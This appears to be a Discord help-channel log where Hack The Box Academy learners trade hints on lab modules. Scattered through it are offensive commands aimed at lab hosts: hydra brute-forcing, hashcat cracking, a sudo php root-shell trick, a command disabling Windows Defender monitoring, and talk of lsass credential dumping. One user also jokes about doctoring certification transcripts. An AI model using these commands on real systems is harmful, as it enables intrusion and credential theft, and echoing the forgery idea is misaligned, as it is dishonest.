@rustic sage I havent gotten there yet. Im stuck on the 5th question in AD assesment 1

which section of the module?

whats the section name that you are stuck on in that module?

I could likely help ive finished that module

@thorn urchin Were you ever able to do the RDP pivot of the pivot module correctly? For what ever reason traffic isnt running over proxifer 🤔 I got the flag but that was rdp from one machine to the next not via the fancy proxy

nope I did it your way too

fwiw Ive never heard of anyone actually proxying that way IRL

rip this module is probably the buggest one yet

half the time im not sure if im not doing right or its bugged

yeah its my second least favorite module so far, though the chisel section carries the whole thing on its back because chisel is just that good

I had trouble getting chisel to work lol

I like sshuttle, its fire and forget

I added notes about cross compiling and smaller bin size and that was helpful

the issue I ran into with it is if I compiled it on my linux machine it wouldn't work on the remote machine. If I compiled from pwnbox it worked

yeah that idk

downside of sshtuttle is its not as flexible, wheras chisel can just be a pure socks5 proxy

Dm if you want

has anyone ever used these modules on HTB academy as CEU's when renewing Sec+

good question

I asked the same thing I need to pay for my CEs and find out

So after downloading my transcripts it dose not list # of hours, so I dont think it would be accepeted

its also missing date of completion

I think if you go into your dashboard and click on completed modules it does show your date of completion. Or you can "retake" the module and today will be your date of completion lol

now as far as the hours my freind think outside the box nothing a little adobe photoshop cant work out.

it tells you on the main page how long a module takes or "should take"

i was gonna try it out...i mean i used my college class as hours before...all i did was put the description...

Hi guys, I need help with the 'Working with rules' practice section in the hashcat module, please. I believe I'm doing what is being asked but am obviously missing something.

It asks you to: "Crack the following SHA1 hash using the techniques taught for generating a custom rule: 46244749d1e8fb99c37ad4f14fccb601ed4ae283. Modify the example rule in the beginning of the section to append 2020 to the end of each password attempt."

And I have created the rule, debugged it and confirmed it's doing what it is supposed to do.

But when I try to crack the hash with "sudo hashcat -m 100 hash /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -r rule" command hashcat exhausts all possibilities and quits

I'm wondering if I'm supposed to create a custom wordlist using the rockyou.txt list but was hesitant to try that because it would increase the length and processing time significantly

Also that is never mentioned, not even on the hint: Create a custom rule and combine it with the rockyou.txt wordlist. This exercise was created in the year 2020.

Reread this part again a bit more closely. It may not be super clear on first glance why it's not working.

Modify the example rule in the beginning of the section to append 2020 to the end of each password attempt.

When you complete a section it typically gives you a list of a copule of boxes to try out the information you have learned, once you leave that page is there any ways to go back and see HTB boxes recommended?

Thanks! Will do.

Yes. Just go to the final section in the completed module and hit “Finish” again and it should take you to that completion page with all the recommended boxes & content.

Haha apparently that wsa the thing I didnt try! TY!

But it would be cool to have a drop down list you could click kinda like the Cheat Sheets.

Password Mutations section's exercise need to be addressed. Been banging my head for the past day trying to find the right rule to crack sam's password. Any other hint except "get rid of first 17k" and "faster on ftp"?

@twin vine brute force ssh

In the active directory module, it has a part on bloodhound in the "Credentialed Enumeration - from Linux " section. How would I connect via freeRDP to the linux system? I have only used it to connect to Windows... "Next, we can type bloodhound from our Linux attack host when logged in using freerdp to start the BloodHound GUI application and upload the data. The credentials are pre-populated on the Linux attack host, but if for some reason a credential prompt is shown, use:"

NVM....Well, once i disconnected my ssh session it let me as just like when I try to connect to windows!

yeah rdp is just rdp, its more common on windows modern day, but its far from windows exclusive

I was trying to do it from another terminal, I didn't think it would matter if I had as ssh connection open as well.

it shouldnt

but idr how that one was setup

Interestingly enough, I just tried a SSH while the RDP is open and I got right in! Weird enough, but at least I can do what I need from here!

<@&861185840277487616>

hi

Hi

Hello, you probably have hundreds of people doing this question, but I will do it again, so I am learning programming by myself, and I am a bit lost in what to choose what path should I choose, and I always wanted to learn more about cybersecurity, I don't have to much time because I work 8 hours per day and I want to dedicate 3 to 5 hours per day to study, my question is, is the academy good for beginners or should I learn somethings first, if so what should I learn first before start with the academy? Thank you for your time in helping me out, I appreciate it very much.

@coral mulch academy is a good place when u have some experience but if u are new it may be hard on academy

Oh OK thanks for helping,

I don't want to be disrespectful, but I was thinking in tryhackme first to gain some knowledge and then use hack the box academy

@coral mulch That is a good plan 👌

Hey guys, I’m currently working on the Linux privilege escalation skill assessment, but I got stuck on flag 4. I managed to find the directory for it, the credentials for the tomcat website, but can’t manage to escalate my privileges on the machine. Could someone perhaps give me a tip into the right direction?

Hi, I'm trying to do the pivoting tunnelling thing, the part with Rpivot but I can't get to see the webserver home page, connection just times out, any ideas?

I mean I guess i could ssh and curl it but that's not really the spirit of the module lol

No one? 😦

@pliant sage i would help u but i am still stuck on how to transfer the rpivot directory to the attacked machine

scp doesn't work?

@placid quest

@pliant sage yes

have you tried: python3 -m http.server 8080 and then from pivot wget http://<IP>:8080/rpivot?

@placid quest

what do i start with?

ah i looked at pinned

@pliant sage i did that but still it is not working

aight I'm outta ideas then

@pliant sage ok i will look for another method

hmu if you figure out a way to connect to the web server page

@pliant sage why not i try to use sshuttle to see what happens

what I don't understand is even if I curl the page I only get the apache default page

@pliant sage maybe try to understand where the flag is

What wordlist do I have to use for ||fiona|| on attacking common services easy?

The provided one doesnt work and rockyou will take 84 hours

@unreal patio why not login with anonymous

It doesnt work on the ftp

Whenever I try to target the ftp it bugs out

And when I log in as anonymous it prompts a pw

@unreal patio disconnect and try again

how learn hack

@placid quest I reset the target and still can't log in with anonymous

Hey guys

can anyone help me with Password attacks with Pass the Ticket from Linux section ?

Thank you @placid quest

I am stuck with the last flag of the Deserialization Attacks Module, if someone have a tip to help me

Htb thm

What's that 😂

Yoo boi what is this server bois?

Tell

Fast

I wanna know

U guys there?

Hello?

Damn

Y u all not responding

😔

Tryhackme .com and hackthebox website

Check that

Check hackthebox website

This server is to help you learn penetration testing skills. The channel you are in is to help with HTB Academy courses called modules.

Wlr

Oki bois ty

😀

@coral mulch no problem

There is more than one way to get important information about the service running using that account. Have you tried enumeration through means other than the command line?

Does someone have 1 minute to dm me about attacking common services easy?

Somehow I totally forgot I could upload files to the server, but managed to get a reverse shell and also escalate my privileges to r***, thank you very much for the tip

Hi guys, need some help with the pivoting and tunneling module, RDP and SOCKS Tunneling with SocksOverRDP.
I have done everything as in the lesson, but I can't get the proxifier to work.

1. Loaded the DLL
2. Created RDP session victor@172.16.5.19 with mstsc.exe
3. From the RDP session, ran SocksOverRDP-Server.exe as administrator
4. Checked the port is listening on the foothold machine, and it is.
5. Set up proxifier as 127.0.0.1:1080 SOCKS5
6. Tried to RDP with mstsc.exe as jason@172.16.5.19, but got the login attempt failed
7. Tried same as 6, but jason@172.16.6.155, and it failed again.

No problem, glad you solved it!

I am having trouble with this can anyone help me.

Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.

p3ta@kali ~/Downloads> sudo impacket-mssqlclient INLANEFREIGHT/DAMUNDSEN:SQL1234!@10.129.201.234 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/mssqlclient.py", line 169, in <module>
ms_sql.connect()
File "/usr/lib/python3/dist-packages/impacket/tds.py", line 535, in connect
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

@simple zephyr did u try with python3

Hi, is there an issue with LinEnum downloads?

I've got it installed on vmbox but it keeps saying 404 on my remote target when I try to download via Python Server.

Unsure if this is an issue anyone else has had?

hey in module "DNS enumeration Using python" in section "DNS Records and queries" i dont find the correct answer for the first question i try multiple answer but nothing... someone for help me please ?

youre trying it against the public provided IP, you need to log into the jump host and run it against the internal IP for the target host.

Cancel my question, for future reference the old reinstall worked ^^;;

i found the Flag in txt record but nothing it s a bug ?

its done sorry ..

Anyone?

@solar granite section

Pivoting, Tunneling, and Port Forwarding module, RDP and SOCKS Tunneling with SocksOverRDP section

@solar granite i am not on that section

What do you mean?

@solar granite i am still on netsh section

Oh

Hi there,
I'm currently doing the web service and api attacks skills assessment.
This is the question Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
I use SQLMap but the htb table does not contain the password column.
Can someone help me to know how to approach the problem?

You are given a WSDL, try using it instead of SQLi

I never got that to work SQLi

yes @solar granite i found this

`|| import requests

payload = f'<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">soap:Body<LoginRequest xmlns="http://tempuri.org/"><username>onthesauce</username><password>admin</password></LoginRequest></soap:Body></soap:Envelope>'

print(requests.post("http://10.129.84.31:3002/wsdl", data=payload, headers={"SOAPAction":'"Login"'}).content)||`

Thanks I’ll play with it after work.

Can I have help with this question in the "Active Directory Enumeration & Attacks" - "Living Off the Land"

I've been googling for a while and I haven't been having luck finding any flags with my dsqueries

Hi guys

After subscribing to VIP, do we has access to the active machines?

to the all*

Yes

I think about to subscribe but I don’t now

Would you mind rephrasing that statement?

What do you mean?

iirc theres a pretty exact command to run mentioned in the section, the thing it doesn't really warn you about well is that it takes a loooooong time to finish. like 20-30 minutes long. Itll make ya feel as if its hanging but its not.

I could be thinking about a different question however

When you said “I think about to subscribe but I don’t now”. What did you mean by that?

Sorry, my english is not good at all. I'm thinking about subscribing

No problem. You should subscribe.Theres lots to learn and it’s worth it. They way I look at it is, Id probably pay more for Netflix and Im really not learning anything from shows in Netflix. HTB provides knowledge which can actually increase ones net worth.

I think this is a different question

nvm then

but the exact command is still in the section

Yeah I know. I would never pay for useless platforms like netflix. I do ctfs on other platform also and I'm subscribed there (I don't tell the name of the platform because the rules). Because that I was not sure whether I should or not

But I subscribed now ✅

youre allowed to say tryhackme here

😉

🙂

Okay

Yeah it’s Tryhackme

Lol

Now I will test the machines 🙂

keep in mind the academy subscriptions are different than the main site subscriptions

Yeah

Are you still stuck? You can dm me if you want

: ( Is the flag in the format HTB{.......} ?

Sorry I'm stupid

probably, Idr

be a moment before I can check

nevermind I got it

Thank you for the help

Trying Smarter Always helps

Hi all, I'm stuck on the Tier 1 machine "Appointment", the task 4 doesn't take any of the answers I enter! Can someone help me with that?

yes

But usually this is for modules

can you DM me please?

Sorry, my first message on this channel, I just joined so not very familiar with what goes where 🙂

no p

@raven cairn

wassup dude

you completed the Initial Enumeration of the Domain true?

which module what section?

I have a problem spawning wireshark there

hmmm

It's been a while since I've done it

You can dm me and I can try to help you out when I have a second

We'll get this figured out !!!!!!!

https://tenor.com/view/tyler1-loltyler1-tyler-gif-18340386

I don't remember using wireshark at all for that section

Hi all, does anyone have experience with the responder.py through a pivoting host (ssh tunnel)? What is better ssh tunnel or chisel?

im a fan of chisel personally

being a socks5 proxy makes things smoother

but also, you cant proxy responder like that to my knowledge

I could be wrong though

its not necessary but it tells me to do it and i want to do it xD

@glad forum this is what you are looking for?

https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots/

neat, be nicer if there was a guide on using a more modern tool though

Hi all, Footprinting hardlab help please. I've tried everything but the right thing of course. I've seen others have found creds but I dont know where to start looking? struggling to connect to the SSH as I think thats where im going to find my next step.. can i connect anonymously?

ssh has no anon feature

ok thats sorted that one.

u can use a id_rsa with -i

i have a server key....

what u mean with server key

server key is likely to be an id_rsa key

oh

I didnt save notes on that assessment though so idr

i got notes

ok cheers mad.

so on my nmap scan i found a server key

u can dm me if you want craizi

cheers

Hi there,
I'm currently doing the web service and api attacks skills assessment.
This is the question Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
I use SQLMap but the htb table does not contain the password column.
Can someone help me to know how to approach the problem?

Thanks! I will try it out.

My boi Arrano still needs some help

Where is MrTom at?

nah its okey, i just was trying to figure out if i was doing something wrong

when you waited 15 minutes for a port scan and realized you used the wrong ip

Fairly stuck on the last part of the knowledge check for Getting Started and all of my notes and web surfing isn't really helping me all too well,

• I've grabbed the user.txt file
• I have a reverse shell (low level priv)
• Target: Root.txt
• required: Root shell

I'm trying to import LinEnum.sh, but on the remote side it keeps giving me permission denied. I can sudo into bin/sh/PHP, but this just breaks the shell (maybe?)

I've been stuck on this for a bit and backtracked in my notes but could use a judge into the right direction or command?

Thanks!

use GTFOBins to find out how to elevate when you have sudo perms as php

I've got one
CMD="/bin/sh" sudo php -r "system($CMD');

But it doesn't work either- I think that may be the one though?

the CMD variable and the sudo command must be on different lines

e.g. submitted one after another

alao you dont have to do the env variable at all

if you think about what its doing you can just run your command directly

https://academy.hackthebox.com/achievement/264064/160

Got it, I'll give it a try, fingers crossed!

run the scan and find out

It worked yaaaay ^^

Hi guys, need some help on Login Bruteforcing Skill Assessment I , question 2.

My command is

hydra -l user -P /usr/share/wordlists/rockyou.txt 134.209.186.13 -s 30720 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"

Been running for a while now, feels wrong. Any tips?

snap, I got a box without looking it up

Victory or death

Hi there, I'm working on linux fundamentals and I can't figure out how to use the locate command for a question

Here's what I have so far

||find -user root -newermt 2020-03-03 -name *.conf -size +25k -size -28k||

I think the problem is that it's trying to find files you need root for but I added the option for it to not

appending "2>/dev/null" will get rid of the errors

Lmfao I didn't even read that good idea

aha might have found it

also you need to specify which directory to start your search in

awesome! 😄

Ty lol I haven't found it yet but I'll specify that

hint the ||parameter||

watching a 22 hours video of god of war ragnarok gameplay (because i don't have a ps5) 🤣

so you can answer both of the question in that section with nmap

yeah i know but i wanted to open wireshark @vital adder

oh the given machine through ssh?

oh wait you can use xfreerdp to rdp in and open wireshark from there

@vital adder yeah but i cant use it bcs i cant run wireshark with privileges

and when i try to wireshark -i {interface} it says me that i dont have permissions

i also tried with sudo:

Hello , I’m stuck on skill assessment login bruteforcing, any clue ?

which one

sure what's the issue

yea the pwnbox have the same issue

im using pwnbox

oh i mean the pwnbox have the same issue with wireshark can't run as root or with sudo

ohok

hello May I please get some assistance with Getting Started foothold for knowledge check. I believe the exploit is the Arbitrary file upload but I am having issues executing it. I don't know if I am on the correct page or not. Thank you

oh for that i did noted down i wasn't able to get the upload thing to work so that still may still be the right path but i use a different method

Metasploit ?

I used metasploit to get in

nope for me a get a shell through ||theme||

I got in with metasploit

didnt take any notes on that module though, it went smoothly

yeah I wanted the exploit that I had to work I just don't know where to upload it

I am thinking that @vital adder used curl ?

no idea but it could be a rabbit hole

k

if I am escalataing privileges how can I use the usr/bin/php to escalate to root ?

do I have to edit the php ?

gtfobins

rule of thumb if you have sudo rights over a programming language interpreter you can just use it to spawn a shell directly as the shell will inherits the perma of the interpreter.

So, how long did it take you guys to crack the Passwords Mutations module? I've grown a beard and mowed my lawn with a pair of nail clippers and this thing still isn't cracked

Oh thanks man, didn't notice it at first, changed it accordingly and it worked

A long time. You can reduce the size of the list by ||checking out the password policies|| , but it will still take a while.

takes ages. Worst part is the whole module you have little way of telling if something is just taking long or if you messed up somewhere

its my least fav module overall

Glad to know I'm not alone. I'll try and read War and Peace in the meantime lol

Just to ensure I'm on the right track, I took the custom.rule list and plugged it into hashcat, along with the password.list that was provided. CMD: hashcat --force password.list -r custom.rule --stdout > mut_password.list

For the Piviot skills assessment how in the hell do you get the lsass off the remote windows machine? Im losing my mind trying to get it

or you can get ||mimikatz|| to that machine

the Av wouldn't remove it?

i think you can just disable it

I tried it wont work

I tried getting a msfvenom on it but the av is stopping it

I tried base64 the lsass dump but that took to long to calculate q.q

That command looks right, you could also pipe it to sort -u, just in case there are any duplicates. I remember ending up with like 90k+ passwords

i mean disable the real time protection

Thanks! Hopefully it won't take too much longer

if it is taking too long remove the first 17000 word from the mutated wordlist

||Set-MpPreference -DisableRealtimeMonitoring $true|| does not work, returns an error

Just use the normal Windows settings

first did you use powershell -ep Bypass before that and i mean in the windows security

I don't remember messing around with AV much in that module.

you can also try secretsdump.py but it can miss things mimikatz doesnt.

Can I talk to you about the way you went about getting the foothold I already completed it

sure

crackmapexec also has an lsass dumping module but Ive not tried it

it wont work because smb isnt authenticating

i tried that lol

And by "normal Windows settings", I mean just go into the settings menu and turn off all stuff regarding AV. I had this same issue.

hi can someone please hepl with Pass the Hash (PtH) - Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.

whats the issue youre having with

Anyone around for a question on the medium lab for the footprinting module? I've found creds for the ||mssql server studio|| from ||smb share||, but they keep erroring out when attempting to log onto the server...

all good just got it.. thank you

Are you trying to login from the command line on Kali?

No, I'm currently trying to log into the microsoft sql server

Here is the error i'm currently receiving

||||

Getting that using both 'sa' and Administrator, with the password from the smb share

Trying to remember what I did here. I should've taken better notes.

Hah all good. I've tried it without the "win..." as well, for good measure

But keeps erorring out

Not sure what I'm missing

Are you using Microsoft SQL Server Management Studio 18?

yep yep

go back and look over your scan results again

That's odd. I just logged in over RDP w/ Administrator and that password and had no problem opening the studio

iirc this is one where the mssql server is publicly facing

hmmm, i'm currently rdp'd as the user alex

ohhhh that one

yeah one user has perms, one doesnt

Log in as the Administrator

I'll be damned

Appreciate the help @waxen barn * @thorn urchin !

Can anyone help with a hint for the final Footprinting - DNS question? I've tried all seclists wordlists and can't find the answer.

have you also enumerated on the initial subdomains you found?

like you found blah.inlanefrieght.htb have you also checked for anything under *.blah.inlanefreight.htb

what is the best tool for enumerating subdomains further? gobuster or continue using DNSenum

im a fan of gobuster personally, but whatever works really

gobuster is more vhosts though

idk if it does actual dns queries

oh it does, yeah Id go with gobuster

Where my FFUF gang at???

@thorn urchin not working with gobuster

I’ve always used ffuf for my subdomain enumeration🙂

有会渗透的吗

Anyone want to do boxes together? If a group of us do it together we can discuss how we did it. Could be a nice way to learn

Please post in English

rule 5 in #rules

I think rule 5 is dumb tbh

finally figured out where i fucked up in the password mutations module

IS THERE ONLY TWO TEIRS FOR THE MACHINES

@here

someone help me with juicypotato

how do i find CLSID and port from machine to windows escalation?

https://outrunsec.com/tag/juicy-potato/

I have a Question on Active Directory --Credentialed Enumeration - from Windows-- There is a section on PowerView, none of the commands listed in the reading seem to work. What step am I missing here? Do I need to do something like Import-Module PowerView (which I tried)? I see powerview.ps1 in the Tools directory and tried importing that as well... Thanks for any insight!!

NVM.... I figured it out. ||Import-Module c:\tools\PowerView.ps1|| in case it helps someone else. Thanks!

Can you link that module?

Oh, thats skill assessment. Did you find vulnerable parameter?

And btw dont try to read passwd file, find other php files on that web app and read them, you will find one path once you decode that

I havent tried reading that, but it did not mattered for me, what really matters first for me is to read and find all available files on that web

Welcome.

Remember to use filters.

can I have some help with this question

I don't want the answer I just wanna know how to do i t

Submit the broadcast address of the following CIDR: 10.200.20.0/27

Because I'm not realy sure how the CIDR ip is createtd

I may have just figured it out correct me if I'm wrong in binary the subnet mask is 1111.1111|1111.1111|1111.1111|1110.0000| the last 8 bits has a decimal value of 224. Subtracting from the maximum subnet mask value you can have being 255 you get 31

so the answer is 10.200.20.31

Looks correct to me

Hello. Is there a way to reformat ssh key? Couldnt find a way to google that. I have found an ssh private key in a message in pop mail server. Couldnt figure a way to save it correctly, ssh always says invalid format. it sarts with -----BEGIN OPENSSH PRIVATE KEY----- and ends with ----end etc. so its not like smth if missing, i guess just format of .txt file is wrong, like missed spaces os smth like that. How can i fix it?